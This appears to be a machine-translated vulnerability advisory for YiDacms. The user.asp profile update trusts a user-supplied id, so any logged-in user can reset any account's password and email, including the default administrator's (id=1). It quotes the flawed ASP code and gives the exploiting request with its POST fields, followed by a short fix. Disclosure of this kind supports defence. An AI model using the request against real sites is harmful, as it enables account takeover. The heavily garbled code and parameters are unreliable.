YiDacms arbitrary user account Reset Vulnerability (including administrator)
YiDacms arbitrary user account reset vulnerability, not only Password
This password reset problem was my first time, completely balancing permissions.
However, it is probably a programmer's problem. modifying user information not only does not determine the user's attributes, but directly modifies the user information based on the id. In addition, you can check the user's email and password, then I submitted it together...
For this reason, you can directly change the user password when you modify the information for the first time, and you can change the password and email together. Therefore, you do not need to find the account and directly change it to the account you want !!!
Look at the Code:
/Yidacms/user. asp file:
If request ("yidacms") = "system" Thenset rs = server. createobject ("adodb. recordset ") user_id = cint (request (" id ") SQL =" select * from shuaiweb_user WHERE id = "& user_id &" rs. open SQL, dbok, 1, 1if session ("shuaiweb_useremail") = "" thenresponse. write "Please log on again! "Response. endend ifif Request. Form (" shuaiweb_username ") =" "then response. write" <script language = javascript> alert ('name cannot be blank! '); History. go (-1); </script> "response. endend ifset rs = server. createobject ("adodb. recordset ") SQL =" select * from shuaiweb_user WHERE id = "& user_id &" rs. open SQL, dbok, 1, 3rs ("shuaiweb_useremail") = filter_Str (trim (request. form ("shuaiweb_useremail") rs ("shuaiweb_userpass") = filter_Str (trim (request. form ("shuaiweb_userpass") rs ("shuaiweb_username") = filter_Str (trim (request. form ("shuaiweb_username") rs ("shua Iweb_usertel ") = filter_Str (trim (request. form ("shuaiweb_usertel") rs ("shuaiweb_userqq") = filter_Str (trim (request. form ("shuaiweb_userqq") rs ("shuaiweb_usermsn") = filter_Str (trim (request. form ("shuaiweb_usermsn") rs ("shuaiweb_useraddress") = filter_Str (trim (request. form ("shuaiweb_useraddress") rs ("shuaiweb_userportrait") = filter_Str (trim (request. form ("shuaiweb_userportrait") rs ("shuaiweb_usernote") = fil Ter_Str (trim (request. form ("shuaiweb_usernote") rs ("shuaiweb_usernumber") = filter_Str (trim (request. form ("shuaiweb_usernumber") rs. updaters. closeset rs = nothingresponse. write "<script language = javascript> alert ('modification successful! '); Location. replace ('user _ system. asp'); parent. location. reload (); </script> "End If
As you can see, here the modification is: directly bringing shuaiweb_useremail and shuaiweb_userpass
There is no judgment:
The request for modifying user information is as follows:
Link: http: // 10.65.40.6/Yidacms/user. asp? Yidacms = system & id = 3 POST: response & shuaiweb_usernumber = 222 & response = 13122222222 & response = 222222 & response = 222222% 40222.com& shuaiweb_useraddress = 222222 & shuaiweb_usernote = 222222 & shuaiweb_useremail = 222222% 40222.com& response = Response & Submit = % CC % E1 % BD % BB
Id is the user id
We modify the id here to modify the user information corresponding to the id, which includes the user name and password.
Let's take a look at the vulnerability proof.
Let's take a look at the user information of user id = 4,222222 @ 222.com:
The password here
Send request:
http://10.65.40.6/Yidacms/user/user.asp?yidacms=system&id=4
Response & shuaiweb_usernumber = 222 & response = 13122222222 & response = 222222 & response = 222222% 40222.com& shuaiweb_useraddress = 222222 & shuaiweb_usernote = 222222 & shuaiweb_useremail = 222222% 40222.com& response = Response & Submit = % CC % E1 % BD % BB and then look at the user's 222222@222.com Password
The password has been modified.
Other information of general users can be modified at will.
This vulnerability allows you to instantly modify the account information of all users.
Admin id = 1. This is an account that already exists when the program is installed by default. You can directly modify the administrator account ..
Solution:
Modifying user information is to determine the attributes of the current Login User